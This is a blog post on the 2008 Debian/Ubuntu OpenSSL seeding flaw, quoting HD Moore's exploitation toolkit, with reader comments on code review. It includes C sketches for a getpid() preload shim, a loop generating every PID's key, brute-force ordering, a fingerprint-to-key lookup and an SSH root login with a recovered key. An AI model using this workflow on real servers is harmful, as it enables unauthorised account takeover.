With the Quickness: HD Moore sets new land speed record with exploitation of Debian/Ubuntu OpenSSL flaw

Summary: So, for those who haven't heard, a Debian packager modified the OpenSSL source used on Debian-based systems (Debian and the whole of the Ubuntu family), removing the code that seeds the PRNG (Pseudo-Random Number Generator) used when creating SSL keys.  Well, HD Moore set a new speed record for exploitation with the release of what he calls Debian-OpenSSL Toys.

HD describes the bug on his page, and I've quoted his explanation below:

On May 13th, 2008 the Debian project announced that Luciano Bello found an interesting vulnerability in the OpenSSL package they were distributing. The bug in question was caused by the removal of the following lines of code from md_rand.c:

MD_Update(&m,buf,j);
[ .. ]
MD_Update(&m,buf,j); /* purify complains */
These lines were removed because they caused the Valgrind and Purify tools to produce warnings about the use of uninitialized data in any code that was linked to OpenSSL. You can see one such report to the OpenSSL team here. Removing this code has the side effect of crippling the seeding process for the OpenSSL PRNG. Instead of mixing in random data for the initial seed, the only "random" value that was used was the current process ID. On the Linux platform, the default maximum process ID is 32,768, resulting in a very small number of seed values being used for all PRNG operations.
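
To put the scale of the damage in concrete terms, here is a minimal illustrative sketch (my own, not the actual md_rand.c code) of what the crippled seeding boils down to: the only varying input left is the process ID, which on Linux defaults to a ceiling of 32,768.

#include <unistd.h>
#include <stdint.h>

/* Illustrative only -- with the MD_Update(&m, buf, j) calls gone, the sole
 * varying input mixed into the PRNG state is the process ID. */
uint32_t effective_seed(void)
{
    /* Linux's default pid_max is 32768, so this value -- and therefore the
     * whole key space derived from it -- has at most 32,768 possibilities. */
    return (uint32_t)getpid();
}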

Mmmm... don't you love security tools?  Just goes to show you: no matter how great your tool set is (and I do like Valgrind), you have to understand how your tools work and, more importantly, how your code works.  No tool can be smart enough to tell you that the uninitialized-data warning it's complaining about should be ignored (or at least properly fixed rather than the code being ripped out), because removing that code effectively neuters the encryption you are trying to accomplish.

The impact of this is unbelievably huge, as HD mentions:

All SSL and SSH keys generated on Debian-based systems (Ubuntu, Kubuntu, etc) between September 2006 and May 13th, 2008 may be affected.  In the case of SSL keys, all generated certificates will need to be recreated and sent off to the Certificate Authority to sign.  Any Certificate Authority keys generated on a Debian-based system will need to be regenerated and revoked.  All system administrators that allow users to access their servers with SSH and public key authentication need to audit those keys to see if any of them were created on a vulnerable system.  Any tools that relied on OpenSSL's PRNG to secure the data they transferred may be vulnerable to an offline attack.  Any SSH server that uses a host key generated by a flawed system is subject to traffic decryption, and a man-in-the-middle attack would be invisible to the users.

This flaw is ugly because even systems that do not use the Debian software need to be audited in case any key is being used that was created on a Debian system.

On to HD's toys...

This is poached directly from HD's page for time savings and because I'm definitely not a crypto guy:

The Toys

The blacklists published by Debian and Ubuntu demonstrate just how small the key space is. When creating a new OpenSSH key, there are only 32,767 possible outcomes for a given architecture, key size, and key type. The reason is that the only "random" data being used by the PRNG is the ID of the process. In order to generate the actual keys that match these blacklists, we need a system containing the correct binaries for the target platform and a way to generate keys with a specific process ID. To solve the process ID issue, I wrote a shared library that could be preloaded and that returns a user-specified value for the getpid() libc call.
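
HD links his actual shared library in the downloads section below; purely as an illustration of the technique, a preload shim along those lines might look something like this (the FAKE_PID environment-variable name and the fallback value are my assumptions, not necessarily what his library does):

/* Hypothetical sketch of an LD_PRELOAD getpid() override.
 * Build: gcc -shared -fPIC -o getpid_faker.so getpid_faker.c
 * Use:   FAKE_PID=1 LD_PRELOAD=./getpid_faker.so ssh-keygen -t dsa -b 1024 ... */
#include <stdlib.h>
#include <sys/types.h>

pid_t getpid(void)
{
    const char *fake = getenv("FAKE_PID");   /* assumed variable name */
    return fake ? (pid_t)atoi(fake) : 1;     /* default to PID 1 if unset */
}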

The next step was to build a chroot environment that contained the actual binaries and libraries from a vulnerable system. I took a snapshot from an Ubuntu system on the local network. You can find the entire chroot environment here. In order to generate an OpenSSH key with a specific type, bit count, and process ID, I wrote a shell script that could be executed from within the chroot environment. You can find this shell script here. This script is placed into the root directory of the extracted Ubuntu filesystem. In order to generate a key, this script is called with the following command line:

# chroot ubunturoot /dokeygen.sh 1 -t dsa -b 1024 -f /tmp/dsa_1024_1
This will generate a new OpenSSH 1024-bit DSA key with the value of getpid() always returning the number "1". We now have our first pre-generated SSH key. If we continue this process for all PIDs up to 32,767 and then repeat it for 2048-bit RSA keys, we have covered the valid key ranges for x86 systems running the buggy version of the OpenSSL library. With this key set, we can compromise any user account that has a vulnerable key listed in the authorized_keys file. This key set is also useful for decrypting a previously-captured SSH session, if the SSH server was using a vulnerable host key. Links to the pre-generated key sets for 1024-bit DSA and 2048-bit RSA keys (x86) are provided in the downloads section below.
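
To make "continue this process for all PIDs up to 32,767" concrete, here is a rough sketch (mine, not HD's cluster code, which per the FAQ below was a distributed, hard-coded version of the same idea) of a driver loop around the chroot command shown above:

/* Sketch: regenerate the 1024-bit DSA key space by invoking the chrooted
 * keygen script once per candidate PID. Paths follow the example above;
 * error handling is minimal, and a single-machine run takes a long time. */
#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    char cmd[256];
    for (int pid = 1; pid <= 32767; pid++) {
        snprintf(cmd, sizeof(cmd),
                 "chroot ubunturoot /dokeygen.sh %d -t dsa -b 1024 -f /tmp/dsa_1024_%d",
                 pid, pid);
        if (system(cmd) != 0)   /* dokeygen.sh pins getpid() to the given PID */
            fprintf(stderr, "keygen failed for PID %d\n", pid);
    }
    return 0;
}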

The interesting thing about these keys is how they are tied to the process ID. Since most Debian-based systems use sequential process ID values (incrementing from system boot and wrapping back around as needed), the process ID of a given key can also indicate how soon from the system boot that key was generated. If we look at the inverse of that, we can determine which keys to use during a brute force based on the target we are attacking. When attempting to guess a key generated at boot time (like a SSH host key), those keys with PID values less than 200 would be the best choices for a brute force. When attacking a user-generated key, we can assume that most of the valid user keys were created with a process ID greater than 500 and less than 10,000. This optimization can significantly speed up a brute force attack on a remote user account over the SSH protocol.
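
That PID heuristic maps naturally onto a simple ordering function for the brute force; a sketch (the thresholds are the ones HD quotes above, the rest is my own illustration):

/* Sketch of the PID-based ordering described above: try the likeliest PIDs
 * first. Host keys are usually generated near boot (low PIDs); user keys
 * tend to land in a mid-range. Lower return value = try earlier. */
typedef enum { TARGET_HOST_KEY, TARGET_USER_KEY } target_t;

static int pid_priority(int pid, target_t target)
{
    if (target == TARGET_HOST_KEY)
        return (pid < 200) ? 0 : 1;
    return (pid > 500 && pid < 10000) ? 0 : 1;
}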

In the near future, this site will be updated to include a brute force tool that can be used to quickly gain access to any SSH account that allows public key authentication using a vulnerable key. The keys in the data files below use the following naming convention:

Algorithm/Bits/Fingerprint-ProcessID and Algorithm/Bits/Fingerprint-ProcessID.pub
To obtain the private key file for any given public key, you need to know the key fingerprint. The easiest way to obtain this fingerprint is through the following command:
$ ssh-keygen -l -f targetkey.pub
2048 c6:7b:14:fa:ae:b6:89:e6:67:17:ee:04:17:b0:ec:4e targetkey.pub
If we look at the public key in an editor, we can also infer that the key type is RSA. In order to locate the private key for this public key, we need to extract the data files, and look for a file named:
 rsa/2048/c67b14faaeb689e66717ee0417b0ec4e-26670
In the example above, the fingerprint is represented in hexadecimal with the colons removed, and the process ID is indicated as "26670". If we want to authenticate to a vulnerable system that uses this public key for authentication, we would run the following command:
$ ssh -i rsa/2048/c67b14faaeb689e66717ee0417b0ec4e-26670 root@targetmachine
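
In other words, once a public key has been harvested, mapping it back to its pre-generated private key is just string manipulation. A small sketch of building the lookup pattern (the helper name is mine; the PID suffix on the matching file is whatever the generator happened to use):

/* Sketch: turn an ssh-keygen fingerprint into a search pattern for the
 * pre-generated key files, per the Algorithm/Bits/Fingerprint-ProcessID
 * naming convention described above. */
#include <stdio.h>
#include <stddef.h>

static void key_search_pattern(char *out, size_t outlen, const char *algo,
                               int bits, const char *fp_with_colons)
{
    char fp[128];
    size_t j = 0;
    for (size_t i = 0; fp_with_colons[i] && j < sizeof(fp) - 1; i++)
        if (fp_with_colons[i] != ':')             /* strip the colons */
            fp[j++] = fp_with_colons[i];
    fp[j] = '\0';
    snprintf(out, outlen, "%s/%d/%s-*", algo, bits, fp);  /* "*" is the PID */
}

/* key_search_pattern(buf, sizeof buf, "rsa", 2048,
 *     "c6:7b:14:fa:ae:b6:89:e6:67:17:ee:04:17:b0:ec:4e")
 * yields rsa/2048/c67b14faaeb689e66717ee0417b0ec4e-*, which matches the
 * file rsa/2048/c67b14faaeb689e66717ee0417b0ec4e-26670 used above. */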

Tools

- GetPID Faker Shared Library (4.0K)
- Ubuntu Root Filesystem (4.9M)
- Key Generation Script (8.0K)

Keys

- SSH 1024-bit DSA Keys X86 (30.0M)
- SSH 2048-bit RSA Keys X86 (48.0M)
- SSH 4096-bit RSA Keys X86 (94.0M)

Frequently Asked Questions

Q: How long did it take to generate these keys?
A: About two hours for the 1024-bit DSA and 2048-bit RSA keys for x86. I used 31 Xeon cores clocked at 2.33GHz.

Q: Will you share your code for distributing the key generation across multiple processors?
A: Nope. The code is hardcoded for this specific cluster and is too poorly written to be worth cleaning up.

Q: How long does it take to crack an SSH user account using these keys?
A: This depends on the speed of the network and the configuration of the SSH server. It should be possible to try all 32,767 keys of both DSA-1024 and RSA-2048 within a couple of hours, but be careful of anti-brute-force scripts on the target server.

Q: I use 16384-bit RSA keys, can these be broken?
A: Yes, it's just a matter of time and processing power. For mere mortals, 4096-bit keys are already a little on the paranoid side. All possible 4096-bit keys should be available within the next day or so. It is possible to generate all combinations of 8192-bit and 16384-bit keys, but I probably have better uses for my processors :-)

All that I can say is, unbelievable.  Serious flaw, yes, but the turnaround time by HD is ridiculous... I think he's trying to get himself nominated for a Pwnie Award.  HD, it's cheating if you are on the voting panel, though!

-Nate

Topics: Software, Open Source, Operating Systems, Security

Talkback

  • As a crypto guy, I have to scream OUCH!!!!

    "All SSL and SSH keys generated on a Debian-based systems (Ubuntu, Kubuntu, etc) between September 2006 and May 13th, 2008 may be affected. In the case of SSL keys, all generated certificates will be need to recreated and sent off to the Certificate Authority to sign. Any Certificate Authority keys generated on a Debian-based system will need be regenerated and revoked."

    As somewhat of a crypto guy, I have to scream OUCH!!!! Certificates don't come cheap. Revoking Root CA keys is painful since that touches everything. This is the equivalent of a scorched-earth attack in the crypto world.
    georgeou
    • Hey George!

      Good as always to see you here!

      Yeah, what really concerns me is that a key generated on a Debian system and used elsewhere is still vulnerable, if I read this right, and, as HD was mentioning in his blog, the entropy is based entirely off the PID. This is worsened because on Debian systems PIDs are assigned relatively sequentially as processes load and tend to be predictable for specific processes (at least to within a range), so this narrows the possibilities down even more.

      So, it's one thing to say you've brute-forced the key space; it's another to say you could probably guesstimate a small range of keys that would lead to success.

      -Nate
      nmcfeters
      • Revoking a Root Certificate Authority is PAINFUL

        Revoking a Root Certificate Authority is PAINFUL. If you're running a bunch of Linux, Windows and Mac machines that trust a particular CA that generated its certificate using this crippled PRNG, then you gotta either touch every machine or use some kind of management system to change out all the clients.

        The PRNG is one of the foundation pieces in crypto. If that's broken (or disabled), the whole thing is built on a house of cards.


        George Ou
        http://www.ForMortals.com
        georgeou
  • Only half the story

    The purpose of using that "uninitialised buffer" (it is in fact uninitialized and its use is valid and intentional) is to help seed the pseudo-random number generator. If you have a /dev/urandom device, OpenSSL will use data from that rather than only the PID and the garbage in the uninitialized buffer and this exploit will not work anyway. This exploit only works as intended when:
    1. you have no /dev/urandom (or similar) OR
    2. you have /dev/urandom but configured OpenSSL not to use it (now why would anyone do THAT)

    The PRNG seeding code exploited here is really a last desperate attempt to try to initialize a random number generator; cryptographers gnash their teeth when they see such code but understand that some people don't have a choice ...

    There is an extremely important lesson to learn here though, and for people who read the LKML you've probably seen this sort of thing come up in numerous flame wars:
    1. leave the damned code alone if you don't know what you're doing
    2. Compiler warnings and numerous other warnings from PERL scripts, tools like Valgrind, etc. do NOT indicate a fault in the code being compiled or tested. Screwing up the code to please some tool and generate fewer (or no) warnings is a genuine sign of ignorance. A competent programmer knows when to ignore warnings and when to scream at the compiler developers for senselessly issuing meaningless warnings.

    Hmmm... I can just imagine Linus ranting again because some idiot submitted yet another 'patch' that eliminated a few hundred compiler warnings ... I haven't been on the LKML for over a year now so I have no idea when this sort of thing last happened on the kernel project.

    Deleting that one line was really making a statement: I'm a MORON and can't be bothered actually reading the code to see what it does.
    zoroaster
    • Whoops.

      My reply below was to this.
      odubtaig
    • To be fair

      You make great points, but to be fair, I think we have to reasonably assume that not everyone in the Linux programming community is as good a programmer as someone who was on the LKML, so props to you for that.

      You make the point:
      2. Compiler warnings and numerous other warnings from PERL scripts, tools like Valgrind, etc. do NOT indicate a fault in the code being compiled or tested. Screwing up the code to please some tool and generate fewer (or no) warnings is a genuine sign of ignorance. A competent programmer knows when to ignore warnings and when to scream at the compiler developers for senselessly issuing meaningless warnings.

      Uninitialized data CAN lead to faults that are security issues, which is why the tools report them. You are spot on though; this should've been reviewed, and it should've been understood why the buffer was uninitialized.

      I'm also a bit concerned that a Debian packager was able to make these changes without going through any other checks to see what was going on.

      -Nate
      nmcfeters
    • So is this an unworking exploit? Author, read the above post.

      Not to say that what Debian did was crazy, but can we determine if this is actually a working exploit, or if the above post mitigates it? Yes, a fix (restore) is needed; however, if you can prove your keys were truly random, there is no need to revoke/regenerate the keys, which, as George explained, is painful.

      TripleII

      P.S. Maybe thank goodness for standard default /dev/urandom?
      TripleII-21189418044173169409978279405827
      • it is a genuine concern

        People using OpenSSL to provide keys and certificates generated on a Debian system need to check and make sure their keys are not on that list. Better still, look at their OpenSSL configuration, check the source code, and determine whether they are victims of that fault.

        Not all people will be affected, and I won't even try to guess what percentage will be affected, but this is definitely exploitable and with the key sets published, you can decrypt a message in no time.
        zoroaster
  • One thing's for sure.

    Someone at quality control needs to burn for letting this through. It's hardly some obscure little tool that no one uses; it needs as tight a control as any other core element, like, oh say, the kernel.
    odubtaig
    • I suspect

      that there was no review at all. Package maintainers are expected to:
      1. hack build scripts etc to make sure the upstream code builds on Debian and files are stored where they belong on the system
      2. fix bugs where they are found and file a bug report upstream
      3. hack the source where appropriate to fit in with the way a Debian system works

      This seems to be a case of a 'fix' being made and not reported upstream (I can't imagine whoever patched this wouldn't receive a lot of abuse on the mailing lists). If this were reported as a bug, people would immediately write back and say "you're an idiot, learn to code" (maybe the upstream maintainers would be more civil).
      zoroaster
  • Due diligence

    Don't those people have any controls in place? Forget the fact that a little testing could have caught this, but some impact analysis way before the fact would have prevented this before a line of code was changed. This is a rookie mistake, and any decent experienced developer would have consulted with some peers before taking this kind of action. The main blame here is on the process, or the lack of it in this case.
    Taz_z
    • what process would work?

      I can't think of any process that would catch problems like this. If a second programmer has to review patches and so on, then the problem may be caught, provided that second programmer knows what they're doing.

      I've spent almost 4 months building an embedded system from scratch and using many Debian packaged sources; I spent most of that time looking through every single Debian patch and deciding whether to apply it or not. With over 16,000 packages in the Debian archives, who's got time to review patches made by n00bs? I think there was simply an assumption that people know what they're doing, and here's an obvious (and unfortunately extremely critical) case where that's just not true.
      zoroaster
  • Testing?

    I'm interested to hear how testing could have caught this. The actual functionality wasn't broken.
    archerjoe
    • Reply to "Due Diligence"

      I pushed the wrong reply button.
      archerjoe
    • The functionality was broken

      If you consider the functionality to be obtaining sufficient entropy and then seeding what would be used to create these keys.

      -Nate
      nmcfeters
      • But is that testable functionality?

        Could a test script catch this? On the surface the functionality didn't fail. Functional keys are still generated. It seems to me, testing for sufficient entropy is a tall order and was probably not considered.
        archerjoe
        • A great point

          No, I don't think a functional script could test for this very easily at all.

          It is a functionality flaw though, one that would've needed to be caught in the source code... I'd have preferred that when this was committed to CVS, someone saw its removal and said... whoa, you're removing the seed.

          Nate
          nmcfeters
    • You missed my point

      My point is that the ramifications of this should have been contemplated before a line of code was changed. The fact that this was exploited so fast suggests to me that an experienced, security-minded developer could have cut this off before it started and maybe come up with a better way of fulfilling the requirement, assuming that getting rid of warnings about uninitialized data is a requirement. Whoever did this should not have had absolute authority to do this, and the people to blame are the ones who put him in this position, but he should have known to go over this first.
      Taz_z
      • I agree a code review would catch this

        A review at the code level could catch this but I don't believe an automated test would.
        archerjoe
      • Completely agreed

        -Nate
        nmcfeters